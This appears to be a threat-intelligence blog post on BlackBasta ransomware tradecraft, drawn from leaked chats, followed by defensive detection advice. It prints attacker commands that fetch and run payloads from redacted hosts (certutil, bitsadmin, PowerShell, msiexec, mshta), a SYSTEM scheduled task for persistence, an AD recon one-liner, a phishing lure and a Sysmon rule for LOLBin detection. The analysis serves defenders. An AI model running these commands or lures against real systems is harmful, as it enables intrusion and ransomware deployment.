Listen to this Post
Like a lot of threat actors, BlackBasta heavily used LOLBins in their attacks. Here are a few examples:
Certutil
certutil -urlcache -split -f https://REDACTED/gm68CGjX C:\Users\Public\payload.exe
WMIC
WMIC /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState /Format:List
Bitsadmin
bitsadmin /transfer payload https://REDACTED/gKWi39HB C:\Users\Public\malware.exe
Schtasks
schtasks /create /sc onlogon /tn UpdateTask /tr "C:\Users\Public\malware.exe" /ru SYSTEM /f
PowerShell – AD Recon
powershell -c "$D=[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain();$L='LDAP://'.$D;$D = [ADSI]$L;$Date = $((Get-Date).AddDays(-90).ToFileTime());$str = '(&(objectcategory=computer)(|(lastlogon>='+$Date+')(lastlogontimestamp>='+$Date+')))';$s = [adsisearcher]$str;$s.searchRoot = $L.$D.distinguishedName;$s.PageSize = 10000;$s.PropertiesToLoad.Add('cn') > $Null;Foreach ($CA in $s.FindAll()){;$i++;}; Write-Output Total computers: $i"
PowerShell – Download Malicious DLL
powershell iwr http://REDACTED:801/download/HK_DNS_x64_n1_x64_inf.dll -outfile C:\Users\Public\HK_DNS_x64_n1_x64_inf.dll
MSIExec
msiexec /i https://REDACTED/gH4TzsYk /quiet /qn /norestart
Cscript / Wscript
cscript C:\Users\Public\payload.vbs wscript C:\Users\Public\payload.vbs
MSHTA
mshta https://REDACTED/g_z3-eZh
Rundll32
rundll32.exe C:\users\public\35S44386.xls,ReleaseImage
RMM Tools
The dataset also mentions the usage of the following RMM tools:
– AnyDesk
– TeamViewer
– Syncro
– Wise RMM
– Tactical RMM
– MeshCentral
Example from the logs:
[text]
Russian “вы какой rmm юзали ? синкро и вайз Сейчас доступ на синкро сохранился”
English “What rmm did you use? syncro and wise Now access to syncro is preserved”
[/text]
Initial Access
Stolen credentials / Cred stuffing were discussed including RDP / VPN / Cpanel etc.
Phishing with fake data breach notifications:
[text]
“We will use our spam engine, the one we used to infect you in the first place, sending a neat, nicely written message:
Hello, this is Whafh – we are sending a follow up to the recent email on disclosing a data breach (because I am sure you sent one to your clients as you are obligated by the law to do so).
In the attached document, you can see further information about the breach, and an audit of exposure.”
[/text]
MSTeams Social Engineering
[text]
Sending target user MRI TWICE to create a “group chat” in order to bypass “external user message approval” prompt
See https://REDACTED/gjAMU_V4
[/text]
0-Days
The group also mentioned leveraging several of the larger 0-day exploits targeting network devices from the past few months:
– Juniper SRX Firewall Unauthenticated RCE
– SonicPanel RCE
– Palo 0-day CVE-2024-3400 back in April. They were offering a working exploit for 15k.
What Undercode Say
The BlackBasta group’s use of LOLBins (Living Off the Land Binaries) highlights the importance of monitoring legitimate system tools for malicious activity. Certutil, WMIC, Bitsadmin, and PowerShell are often exploited by attackers to download payloads, execute commands, and perform reconnaissance. Defenders should focus on detecting anomalous usage of these tools, such as Certutil being used to download files from external URLs or PowerShell executing unusual scripts.
For Linux defenders, similar techniques can be detected using tools like `auditd` to monitor command-line activity:
auditctl -a always,exit -F arch=b64 -S execve -k suspicious_commands
Windows defenders can use Sysmon to track LOLBin usage:
<RuleGroup name="" groupRelation="or"> <ProcessCreate onmatch="include"> <CommandLine condition="contains">certutil</CommandLine> <CommandLine condition="contains">bitsadmin</CommandLine> <CommandLine condition="contains">powershell</CommandLine> </ProcessCreate> </RuleGroup>
For RMM tools, ensure that only authorized software is installed and monitor for unusual remote connections. Use firewall rules to restrict access to RMM tools from untrusted IPs.
Phishing remains a significant threat. Implement email filtering solutions and educate users on identifying suspicious emails. For MSTeams, enforce strict policies for external communication and monitor for unusual group chat creation.
Finally, patch management is critical to mitigate 0-day exploits. Regularly update network devices and apply vendor patches as soon as they are released. Use intrusion detection systems (IDS) to monitor for exploit attempts:
suricata -c /etc/suricata/suricata.yaml -i eth0
Stay vigilant and continuously update your defenses to counter evolving threats.
**Relevant URLs:**
References:
Hackers Feeds, Undercode AI